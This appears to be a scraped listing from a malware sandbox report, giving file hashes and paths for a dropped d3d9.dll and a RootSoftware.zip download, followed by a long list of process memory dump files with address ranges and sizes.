87d6dea8c8ea10dbda4105ae62f0f2aab29b2d4f511e39e46ebbac86fe473049a8ac22fa981b020586e5ad2f0c1ea3b5612b6905c0df95460523cc3e6e0c8ec2

Download Submit
C:\Users\Admin\AppData\Roaming\d3d9.dll

Filesize
511KB

MD5
d43263f1cc917dbf0b08ec6f0fc7a379

SHA1
d17d8ef6f004495ba4ffc3fb256529b7fd69a1e1

SHA256
08381f4e456fedab1a5f385dc2d0a18d67bec384537679eef56f4273d30615f7

SHA512
4ad9458201ae3c028da946a80ab8c05b2ee48ffd31f512f6afacdae3ca9eea207580a6b014089326982f3a2e0512472b26ccfaa2fac96d635f2d76d73bce4db2

Download Submit
C:\Users\Admin\Downloads\RootSoftware.zip

Filesize
40.8MB

MD5
9582d667947b305e59ace58fe54d53fc

SHA1
05753571d0561473bd7a8f2f8c71db277551f374

SHA256
1eed291f6c1e70d938cde3d73c5b190303887ce48c6604bd1c9e3569207c33d7

SHA512
dc05463819c06fe48f05aac92cae02a18f6bf1bd846f7e7f327079fb5ad282730aeed8c3d2e4bf1bfdf6b157e6c279557c538d272c313ab557cd6fc52153bb2c

Download Submit
memory/2020-833-0x0000000000EE0000-0x0000000000EF0000-memory.dmp

Filesize
64KB

Download
memory/2460-898-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-860-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-835-0x0000000000A00000-0x0000000000A36000-memory.dmp

Filesize
216KB

Download
memory/2460-906-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-848-0x0000000005340000-0x00000000053AC000-memory.dmp

Filesize
432KB

Download
memory/2460-908-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-858-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-866-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-868-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-874-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-884-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-888-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-896-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-912-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-853-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-854-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-856-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-910-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-862-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-864-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-916-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-871-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-872-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-876-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-879-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-880-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-882-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-886-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-890-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-892-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-894-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-914-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-900-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-902-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/2460-905-0x0000000005340000-0x00000000053A5000-memory.dmp

Filesize
404KB

Download
memory/3524-834-0x000001F1F9670000-0x000001F1F96C4000-memory.dmp

Filesize
336KB

Download
memory/3684-2541-0x0000000007770000-0x000000000778A000-memory.dmp

Filesize
104KB

Download
memory/3684-2511-0x00000000757E0000-0x000000007582C000-memory.dmp

Filesize
304KB

Download
memory/3684-2537-0x0000000007670000-0x000000000767E000-memory.dmp

Filesize
56KB

Download
memory/3684-2521-0x00000000066E0000-0x00000000066FE000-memory.dmp

Filesize
120KB

Download
memory/3684-2540-0x0000000007680000-0x0000000007694000-memory.dmp

Filesize
80KB

Download
memory/3684-2536-0x0000000007630000-0x0000000007641000-memory.dmp

Filesize
68KB

Download
memory/3684-2542-0x0000000007750000-0x0000000007758000-memory.dmp

Filesize
32KB

Download
memory/3684-2363-0x0000000005980000-0x00000000059A2000-memory.dmp

Filesize
136KB

Download
memory/3684-2382-0x0000000006100000-0x000000000611E000-memory.dmp

Filesize
120KB

Download
memory/3684-2383-0x0000000006140000-0x000000000618C000-memory.dmp

Filesize
304KB

Download
memory/3684-2534-0x00000000076B0000-0x0000000007746000-memory.dmp

Filesize
600KB

Download
memory/3684-2510-0x00000000070C0000-0x00000000070F2000-memory.dmp

Filesize
200KB

Download
memory/3684-2366-0x0000000005A20000-0x0000000005A86000-memory.dmp

Filesize
408KB

Download
memory/3684-2522-0x0000000007300000-0x00000000073A3000-memory.dmp

Filesize
652KB

Download
memory/3684-2526-0x0000000007430000-0x000000000744A000-memory.dmp

Filesize
104KB

Download
memory/3684-2372-0x0000000005A90000-0x0000000005AF6000-memory.dmp

Filesize
408KB

Download
memory/3684-2381-0x0000000005B00000-0x0000000005E54000-memory.dmp

Filesize
3.3MB

Download
memory/3684-846-0x00000000052C0000-0x00000000058E8000-memory.dmp

Filesize
6.2MB

Download
memory/3684-2527-0x00000000074C0000-0x00000000074CA000-memory.dmp

Filesize
40KB

Download
memory/3684-836-0x0000000002B30000-0x0000000002B66000-memory.dmp

Filesize
216KB

Download
memory/3684-2525-0x0000000007A80000-0x00000000080FA000-memory.dmp

Filesize
6.5MB

Download
memory/4712-4235-0x000002097E950000-0x000002097E972000-memory.dmp

Filesize
136KB

Download
memory/5320-4300-0x000001DEFFB40000-0x000001DEFFB4A000-memory.dmp

Filesize
40KB

Download
memory/5320-4305-0x000001DEFFB80000-0x000001DEFFB86000-memory.dmp

Filesize
24KB

Download
memory/5320-4298-0x000001DEFFB60000-0x000001DEFFB7C000-memory.dmp

Filesize
112KB

Download
memory/5320-4306-0x000001DEFFB90000-0x000001DEFFB9A000-memory.dmp

Filesize
40KB

Download
memory/5320-4295-0x000001DEFF920000-0x000001DEFF93C000-memory.dmp

Filesize
112KB

Download
memory/5320-4296-0x000001DEFF940000-0x000001DEFF9F5000-memory.dmp

Filesize
724KB

Download
memory/5320-4297-0x000001DEFF910000-0x000001DEFF91A000-memory.dmp

Filesize
40KB

Download
memory/5320-4303-0x000001DEFFBA0000-0x000001DEFFBBA000-memory.dmp

Filesize
104KB

Download
memory/5320-4304-0x000001DEFFB50000-0x000001DEFFB58000-memory.dmp

Filesize
32KB

Download
memory/6488-4258-0x00000000071E0000-0x0000000007283000-memory.dmp

Filesize
652KB

Download
memory/6488-4248-0x0000000074700000-0x000000007474C000-memory.dmp

Filesize
304KB

Download
memory/6488-4245-0x0000000006110000-0x000000000615C000-memory.dmp

Filesize
304KB

Download
memory/6488-4262-0x0000000007550000-0x0000000007561000-memory.dmp

Filesize
68KB

Download
memory/6488-4234-0x0000000005A40000-0x0000000005D94000-memory.dmp

Filesize
3.3MB

Download
memory/6488-4264-0x0000000007590000-0x00000000075A4000-memory.dmp

Filesize
80KB

Download